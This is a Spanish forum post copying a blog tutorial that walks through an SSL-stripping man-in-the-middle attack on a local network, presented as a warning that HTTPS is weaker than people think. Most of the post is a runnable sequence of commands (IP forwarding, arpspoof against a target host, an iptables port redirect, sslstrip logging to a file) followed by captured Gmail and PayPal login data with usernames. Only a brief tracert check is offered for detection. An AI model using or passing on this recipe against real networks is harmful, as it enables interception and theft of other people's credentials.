Me parece muy interesante para todos los que trabajamos habitualmente en una red lan
y nuestros pass "seguros" aparentemente no lo son tanto.
(Nota:transcribo el texto original)
Muy buenas a todos/as!
Utilizamos hoy en día Internet para muchas cosas, mirar nuestro correo, mantenernos 2. comunicados con la gente, conexiones a bancos etc…
Nadie nos ha enseñado a navegar de manera segura pero conocemos conceptos como:
1. Siempre que vayas a poner datos de carácter personal que la conexión sea segura que ponga HTTPS.
2. Que nos fijemos en la imagen del candadito
Algo así como esto:

HTTPS no es tan seguro como nos creemos, tiene debilidades, haremos una prueba de concepto.
El diagrama de red sería el siguiente

Este es el escenario planteado.
Suponemos que conocemos la IP del atacante.
Habilitamos el Forwanding en la máquina atacante
Código: Seleccionar todo
root@bt:~# echo “1? > /proc/sys/net/ipv4/ip_forward
Código: Seleccionar todo
root@bt:~# arpspoof -i eth0 -t 192.168.78.137 192.168.78.2
Código: Seleccionar todo
0:c:29:72:9a:32 0:c:29:e4:a8:97 0806 42: arp reply 192.168.78.2 is-at 0:c:29:72:9a:32
Ahora mediante IPTABLES hacemos la redirección de puertos
Código: Seleccionar todo
root@bt:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
Código: Seleccionar todo
root@bt:~# sslstrip -w passwords
Escribiremos todos lo que recojamos de SSLSTRIP en un fichero llamado passwords
Ahora mediante TAIL iremos viendo lo que sale por pantalla
root@bt:~# tail -f passwords
Ahora cuando la máquina atacante acceda a su correo, a GMAIL por ejemplo
Veremos como nos saca el password en texto plano
Código: Seleccionar todo
2010-07-24 00:36:26,739 SECURE POST Data (www.google.com):
ltmpl=default<mplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=6669774865561864179<mpl=default<mpl=default&scc=1&timeStmp=&secTok=&GALX=dPSLG5jykg8&Email=mriverolopez&Passwd=CONTRASEÑA&rmShown=1&signIn=Acceder&asts=
Código: Seleccionar todo
2010-07-24 01:47:25,907 SECURE POST Data (www.paypal.com):
login_cmd=&login_params=&login_email=Seifreed&login_password=CONTRASEÑA&target_page=0&submit.x=
La pregunta es.. ¿ Como saber si estamos sufriendo un man in the middle ?
Una de las maneras sería haciendo un tracert

Como véis primero nos saldría la máquina que no está haciendo el man in the middle y luego nuestro router.
Así que tened cuidadín, desde que ubicaciones accedéis a vuestros datos privados.
Saludos
Fuente :seifreed.com